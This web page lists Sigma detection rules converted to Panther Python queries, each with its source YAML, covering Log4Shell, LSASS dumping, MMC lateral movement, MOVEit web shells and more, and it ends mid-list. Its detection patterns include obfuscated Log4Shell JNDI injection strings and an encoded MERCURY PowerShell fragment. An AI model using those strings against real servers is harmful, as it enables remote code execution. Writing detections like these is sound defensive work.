Panther

3,750 rules · Sigma detections in Panther syntax
The same Sigma detection corpus, machine-rendered into Panther query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.

Detection rules

50 shown of 3,750
high
Loading of Kernel Module via Insmod
Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
status: test · author: Pawel Mazur · id: 106d7cbd-80ff-4985-b682-a7043e5acb72
Panther query:
def rule(event):
    if all(
        [
            event.deep_get("type", default="") == "SYSCALL",
            event.deep_get("comm", default="") == "insmod",
            event.deep_get("exe", default="") == "/usr/bin/kmod",
        ]
    ):
        return True
    return False
Sigma YAML:
title: Loading of Kernel Module via Insmod
id: 106d7cbd-80ff-4985-b682-a7043e5acb72
status: test
description: |
    Detects loading of kernel modules with insmod command.
    Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
    Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md
    - https://linux.die.net/man/8/insmod
    - https://man7.org/linux/man-pages/man8/kmod.8.html
author: 'Pawel Mazur'
date: 2021-11-02
modified: 2022-12-25
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1547.006
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'SYSCALL'
        comm: insmod
        exe: /usr/bin/kmod
    condition: selection
falsepositives:
    - Unknown
level: high
high
Local Privilege Escalation Indicator TabTip
Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
status: test · author: Florian Roth (Nextron Systems) · id: bc2e25ed-b92b-4daa-b074-b502bdd1982b
Panther query:
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "Microsoft-Windows-DistributedCOM",
            event.deep_get("EventID", default="") == 10001,
            event.deep_get("param1", default="")
            == "C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe",
            event.deep_get("param2", default="") == 2147943140,
            event.deep_get("param3", default="") == "{054AAE20-4BEA-4347-8A35-64A533254A9D}",
        ]
    ):
        return True
    return False
Sigma YAML:
title: Local Privilege Escalation Indicator TabTip
id: bc2e25ed-b92b-4daa-b074-b502bdd1982b
status: test
description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
references:
    - https://github.com/antonioCoco/JuicyPotatoNG
author: Florian Roth (Nextron Systems)
date: 2022-10-07
modified: 2023-04-14
tags:
    - attack.collection
    - attack.execution
    - attack.credential-access
    - attack.t1557.001
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Microsoft-Windows-DistributedCOM'
        EventID: 10001
        param1: 'C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe'  # Binary starting/started
        param2: 2147943140                                                       # ERROR id
        param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}'                         # DCOM Server
    condition: selection
falsepositives:
    - Unknown
level: high
high
Log4j RCE CVE-2021-44228 Generic
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
status: test · author: Florian Roth (Nextron Systems) · id: 5ea8faa8-db8b-45be-89b0-151b84c82702
Panther query:
import json

# Log4Shell JNDI lookup strings, including URL-encoded and obfuscated variants
LOG4SHELL_KEYWORDS = [
    "${jndi:ldap:/",
    "${jndi:rmi:/",
    "${jndi:ldaps:/",
    "${jndi:dns:/",
    "/$%7bjndi:",
    "%24%7bjndi:",
    "$%7Bjndi:",
    "%2524%257Bjndi",
    "%2F%252524%25257Bjndi%3A",
    "${jndi:${lower:",
    "${::-j}${",
    "${jndi:nis",
    "${jndi:nds",
    "${jndi:corba",
    "${jndi:iiop",
    "Reference Class Name: foo",
    "${${env:BARFOO:-j}",
    "${::-l}${::-d}${::-a}${::-p}",
    "${base64:JHtqbmRp",
    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$",
    "${${lower:j}ndi:",
    "${${upper:j}ndi:",
    "${${::-j}${::-n}${::-d}${::-i}:",
]

# Known vulnerability-scanner traffic excluded by the Sigma filter
SCANNER_FILTER = [
    "w.nessus.org/nessus",
    "/nessus}",
]


def rule(event):
    # Unbound keyword search: serialise the whole event once instead of once per keyword
    doc = json.dumps(event.to_dict())
    if not any(keyword in doc for keyword in LOG4SHELL_KEYWORDS):
        return False
    # Sigma condition: keywords and not filter
    return not any(keyword in doc for keyword in SCANNER_FILTER)
Sigma YAML:
title: Log4j RCE CVE-2021-44228 Generic
id: 5ea8faa8-db8b-45be-89b0-151b84c82702
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2022-02-06
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    keywords:
        - '${jndi:ldap:/'
        - '${jndi:rmi:/'
        - '${jndi:ldaps:/'
        - '${jndi:dns:/'
        - '/$%7bjndi:'
        - '%24%7bjndi:'
        - '$%7Bjndi:'
        - '%2524%257Bjndi'
        - '%2F%252524%25257Bjndi%3A'
        - '${jndi:${lower:'
        - '${::-j}${'
        - '${jndi:nis'
        - '${jndi:nds'
        - '${jndi:corba'
        - '${jndi:iiop'
        - 'Reference Class Name: foo'
        - '${${env:BARFOO:-j}'
        - '${::-l}${::-d}${::-a}${::-p}'
        - '${base64:JHtqbmRp'
        - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
        - '${${lower:j}ndi:'
        - '${${upper:j}ndi:'
        - '${${::-j}${::-n}${::-d}${::-i}:'
    filter:
        - 'w.nessus.org/nessus'
        - '/nessus}'
    condition: keywords and not filter
falsepositives:
    - Vulnerability scanning
level: high
high
Log4j RCE CVE-2021-44228 in Fields
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
status: test · author: Florian Roth (Nextron Systems) · id: 9be472ed-893c-4ec0-94da-312d2765f654
Panther query:
# Log4Shell JNDI lookup strings, including URL-encoded and obfuscated variants
LOG4SHELL_KEYWORDS = [
    "${jndi:ldap:/",
    "${jndi:rmi:/",
    "${jndi:ldaps:/",
    "${jndi:dns:/",
    "/$%7bjndi:",
    "%24%7bjndi:",
    "$%7Bjndi:",
    "%2524%257Bjndi",
    "%2F%252524%25257Bjndi%3A",
    "${jndi:${lower:",
    "${::-j}${",
    "${jndi:nis",
    "${jndi:nds",
    "${jndi:corba",
    "${jndi:iiop",
    "Reference Class Name: foo",
    "${${env:BARFOO:-j}",
    "${::-l}${::-d}${::-a}${::-p}",
    "${base64:JHtqbmRp",
    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$",
    "${${lower:j}ndi:",
    "${${upper:j}ndi:",
    "${${::-j}${::-n}${::-d}${::-i}:",
]

# Web server log fields covered by selection1, selection3 and selection4
LOG4SHELL_FIELDS = ["cs-user-agent", "cs-uri-query", "cs-referer"]


def rule(event):
    # Sigma condition "1 of selection*": any keyword in any of the fields fires the rule
    for field in LOG4SHELL_FIELDS:
        value = event.deep_get(field, default="")
        if any(keyword in value for keyword in LOG4SHELL_KEYWORDS):
            return True
    return False
Sigma YAML:
title: Log4j RCE CVE-2021-44228 in Fields
id: 9be472ed-893c-4ec0-94da-312d2765f654
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-44228
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection1:
        cs-user-agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    # selection2:
        # user-agent|contains:
            # - '${jndi:ldap:/'
            # - '${jndi:rmi:/'
            # - '${jndi:ldaps:/'
            # - '${jndi:dns:/'
            # - '/$%7bjndi:'
            # - '%24%7bjndi:'
            # - '$%7Bjndi:'
            # - '%2524%257Bjndi'
            # - '%2F%252524%25257Bjndi%3A'
            # - '${jndi:${lower:'
            # - '${::-j}${'
            # - '${jndi:nis'
            # - '${jndi:nds'
            # - '${jndi:corba'
            # - '${jndi:iiop'
            # - 'Reference Class Name: foo'
            # - '${${env:BARFOO:-j}'
            # - '${::-l}${::-d}${::-a}${::-p}'
            # - '${base64:JHtqbmRp'
            # - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            # - '${${lower:j}ndi:'
            # - '${${upper:j}ndi:'
            # - '${${::-j}${::-n}${::-d}${::-i}:'
    selection3:
        cs-uri-query|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    selection4:
        cs-referer|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    condition: 1 of selection*
falsepositives:
    - Vulnerability scanning
level: high
high
Logging Configuration Changes on Linux Host
Detect changes of syslog daemons configuration files
status: test · author: Mikhail Larin, oscd.community · id: c830f15d-6f6e-430f-8074-6f73d6807841
Panther query:
def rule(event):
    if all(
        [
            event.deep_get("type", default="") == "PATH",
            event.deep_get("name", default="")
            in ["/etc/syslog.conf", "/etc/rsyslog.conf", "/etc/syslog-ng/syslog-ng.conf"],
        ]
    ):
        return True
    return False
Sigma YAML:
title: Logging Configuration Changes on Linux Host
id: c830f15d-6f6e-430f-8074-6f73d6807841
status: test
description: Detect changes of syslog daemons configuration files
references:
    - self experience
author: Mikhail Larin, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'PATH'
        name:
            - /etc/syslog.conf
            - /etc/rsyslog.conf
            - /etc/syslog-ng/syslog-ng.conf
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: high
high
Lolbas OneDriveStandaloneUpdater.exe Proxy Download
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
status: test · author: frack113 · id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
Panther query:
def rule(event):
    if (
        "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"
        in event.deep_get("TargetObject", default="")
    ):
        return True
    return False
Sigma YAML:
title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
status: test
description: |
    Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
    anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
references:
    - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
author: frack113
date: 2022-05-28
modified: 2023-08-17
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Lsass Full Dump Request Via DumpType Registry Settings
Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
status: test · author: @pbssubhash · id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
Panther query:
def rule(event):
    if all(
        [
            any(
                [
                    "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType"
                    in event.deep_get("TargetObject", default=""),
                    "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType"
                    in event.deep_get("TargetObject", default=""),
                ]
            ),
            event.deep_get("Details", default="") == "DWORD (0x00000002)",
        ]
    ):
        return True
    return False
Sigma YAML:
title: Lsass Full Dump Request Via DumpType Registry Settings
id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
status: test
description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
references:
    - https://github.com/deepinstinct/Lsass-Shtinkering
    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
author: '@pbssubhash'
date: 2022-12-08
modified: 2023-08-17
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains:
            - '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType'
            - '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe\DumpType'
        Details: 'DWORD (0x00000002)' # Full Dump
    condition: selection
falsepositives:
    - Legitimate application that needs to do a full dump of their process
level: high
high
Lsass Memory Dump via Comsvcs DLL
Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
status: test · author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) · id: a49fa4d5-11db-418c-8473-1e014a8dd462
Panther query:
def rule(event):
    if all(
        [
            event.deep_get("TargetImage", default="").endswith("\\lsass.exe"),
            event.deep_get("SourceImage", default="").endswith("\\rundll32.exe"),
            "comsvcs.dll" in event.deep_get("CallTrace", default=""),
        ]
    ):
        return True
    return False
Sigma YAML:
title: Lsass Memory Dump via Comsvcs DLL
id: a49fa4d5-11db-418c-8473-1e014a8dd462
status: test
description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
references:
    - https://twitter.com/shantanukhande/status/1229348874298388484
    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2023-11-29
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_access
    product: windows
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        SourceImage|endswith: '\rundll32.exe'
        CallTrace|contains: 'comsvcs.dll'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Lummac Stealer Activity - Execution Of More.com And Vbc.exe
Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
status: experimental · author: Joseliyo Sanchez, @Joseliyo_Jstnk · id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
Panther query:
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\more.com"),
            any(
                [
                    event.deep_get("Image", default="").endswith("\\vbc.exe"),
                    event.deep_get("OriginalFileName", default="") == "vbc.exe",
                ]
            ),
        ]
    ):
        return True
    return False
Sigma YAML:
title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
status: experimental
description: |
    Detects the execution of more.com and vbc.exe in the process tree.
    This behavior was observed by a set of samples related to Lummac Stealer.
    The Lummac payload is injected into the vbc.exe process.
references:
    - https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files
    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-12-19
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
    selection_parent:
        ParentImage|endswith: '\more.com'
    selection_child:
        - Image|endswith: '\vbc.exe'
        - OriginalFileName: 'vbc.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
high
MERCURY APT Activity
Detects suspicious command line patterns seen being used by MERCURY APT
status: test · author: Florian Roth (Nextron Systems) · id: a62298a3-1fe0-422f-9a68-ffbcbc5a123d
Panther query:
def rule(event):
    if all(
        [
            "-exec bypass -w 1 -enc" in event.deep_get("CommandLine", default=""),
            "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA"
            in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
Sigma YAML:
title: MERCURY APT Activity
id: a62298a3-1fe0-422f-9a68-ffbcbc5a123d
status: test
description: Detects suspicious command line patterns seen being used by MERCURY APT
references:
    - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
author: Florian Roth (Nextron Systems)
date: 2022-08-26
modified: 2023-03-10
tags:
    - attack.execution
    - attack.t1059.001
    - attack.g0069
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '-exec bypass -w 1 -enc'
            - 'UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA'  # Start-Job -ScriptBlock
    condition: selection
falsepositives:
    - Unknown
level: high
high
MMC Executing Files with Reversed Extensions Using RTLO Abuse
Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
status: experimental · author: Swachchhanda Shrawan Poudel (Nextron Systems) · id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
Panther query:
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\mmc.exe"),
                    event.deep_get("OriginalFileName", default="") == "MMC.exe",
                ]
            ),
            any(
                [
                    "cod.msc" in event.deep_get("CommandLine", default=""),
                    "fdp.msc" in event.deep_get("CommandLine", default=""),
                    "ftr.msc" in event.deep_get("CommandLine", default=""),
                    "lmth.msc" in event.deep_get("CommandLine", default=""),
                    "slx.msc" in event.deep_get("CommandLine", default=""),
                    "tdo.msc" in event.deep_get("CommandLine", default=""),
                    "xcod.msc" in event.deep_get("CommandLine", default=""),
                    "xslx.msc" in event.deep_get("CommandLine", default=""),
                    "xtpp.msc" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
Sigma YAML:
title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
status: experimental
description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
references:
    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
    - https://en.wikipedia.org/wiki/Right-to-left_override
    - https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
    - attack.execution
    - attack.stealth
    - attack.t1204.002
    - attack.t1218.014
    - attack.t1036.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_image:
        - Image|endswith: '\mmc.exe'
        - OriginalFileName: 'MMC.exe'
    selection_commandline:
        CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file
            - 'cod.msc'  # Reversed `.doc`
            - 'fdp.msc'  # Reversed `.pdf`
            - 'ftr.msc'  # Reversed `.rtf`
            - 'lmth.msc'  # Reversed `.html`
            - 'slx.msc'  # Reversed `.xls`
            - 'tdo.msc'  # Reversed `.odt`
            - 'xcod.msc'  # Reversed `.docx`
            - 'xslx.msc'  # Reversed `.xlsx`
            - 'xtpp.msc'  # Reversed `.pptx`
    condition: all of selection_*
falsepositives:
    - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
    - Unconventional but non-malicious usage of RLO or reversed extensions.
level: high
high
MMC Spawning Windows Shell
Detects a Windows command line executable started from MMC
status test author Karneades, Swisscom CSIRT id 05a2ab7e-ce11-4b63-86db-ab32e763e11d
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\mmc.exe"),
            any(
                [
                    any(
                        [
                            event.deep_get("Image", default="").endswith("\\cmd.exe"),
                            event.deep_get("Image", default="").endswith("\\powershell.exe"),
                            event.deep_get("Image", default="").endswith("\\pwsh.exe"),
                            event.deep_get("Image", default="").endswith("\\wscript.exe"),
                            event.deep_get("Image", default="").endswith("\\cscript.exe"),
                            event.deep_get("Image", default="").endswith("\\sh.exe"),
                            event.deep_get("Image", default="").endswith("\\bash.exe"),
                            event.deep_get("Image", default="").endswith("\\reg.exe"),
                            event.deep_get("Image", default="").endswith("\\regsvr32.exe"),
                        ]
                    ),
                    "\\BITSADMIN" in event.deep_get("Image", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MMC Spawning Windows Shell
id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d
status: test
description: Detects a Windows command line executable started from MMC
references:
    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
author: Karneades, Swisscom CSIRT
date: 2019-08-05
modified: 2022-07-14
tags:
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        ParentImage|endswith: '\mmc.exe'
    selection2:
        - Image|endswith:
              - '\cmd.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\wscript.exe'
              - '\cscript.exe'
              - '\sh.exe'
              - '\bash.exe'
              - '\reg.exe'
              - '\regsvr32.exe'
        - Image|contains: '\BITSADMIN'
    condition: all of selection*
level: high
high
MMC20 Lateral Movement
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
status test author @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea) id f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\svchost.exe"),
            event.deep_get("Image", default="").endswith("\\mmc.exe"),
            "-Embedding" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MMC20 Lateral Movement
id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
status: test
description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
references:
    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
author: '@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)'
date: 2020-03-04
modified: 2021-11-27
tags:
    - attack.execution
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\svchost.exe'
        Image|endswith: '\mmc.exe'
        CommandLine|contains: '-Embedding'
    condition: selection
falsepositives:
    - Unlikely
level: high
high
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
Detects GET requests to specific files used during the exploitation of MOVEit CVE-2023-34362
status test author Nasreddine Bencherchali (Nextron Systems) id 435e41f2-48eb-4c95-8a2b-ed24b50ec30b
panther query
def rule(event):
    if all(
        [
            event.deep_get("cs-method", default="") == "GET",
            any(
                [
                    "/human2.aspx" in event.deep_get("cs-uri-stem", default=""),
                    "/_human2.aspx" in event.deep_get("cs-uri-stem", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
id: 435e41f2-48eb-4c95-8a2b-ed24b50ec30b
status: test
description: Detects GET requests to specific files used during the exploitation of MOVEit CVE-2023-34362
references:
    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
    - https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-03
modified: 2023-07-28
tags:
    - attack.persistence
    - attack.t1505.003
    - cve.2023-34362
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-method: 'GET'
        cs-uri-stem|contains:
            - '/human2.aspx'
            - '/_human2.aspx'
    condition: selection
falsepositives:
    - Unlikely
level: high
high
MSDT Execution Via Answer File
Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
status test author Nasreddine Bencherchali (Nextron Systems) id 9c8c7000-3065-44a8-a555-79bcba5d9955
panther query
def rule(event):
    if all(
        [
            event.deep_get("Image", default="").endswith("\\msdt.exe"),
            "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml"
            in event.deep_get("CommandLine", default=""),
            any(
                [
                    " -af " in event.deep_get("CommandLine", default=""),
                    " /af " in event.deep_get("CommandLine", default=""),
                    " –af " in event.deep_get("CommandLine", default=""),
                    " —af " in event.deep_get("CommandLine", default=""),
                    " ―af " in event.deep_get("CommandLine", default=""),
                ]
            ),
            not event.deep_get("ParentImage", default="").endswith("\\pcwrun.exe"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSDT Execution Via Answer File
id: 9c8c7000-3065-44a8-a555-79bcba5d9955
status: test
description: |
    Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
modified: 2025-10-29
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msdt.exe'
        CommandLine|contains: '\WINDOWS\diagnostics\index\PCWDiagnostic.xml'
        CommandLine|contains|windash: ' -af '
    filter_main_pcwrun:
        ParentImage|endswith: '\pcwrun.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Possible undocumented parents of "msdt" other than "pcwrun".
level: high
high
MSHTA Execution with Suspicious File Extensions
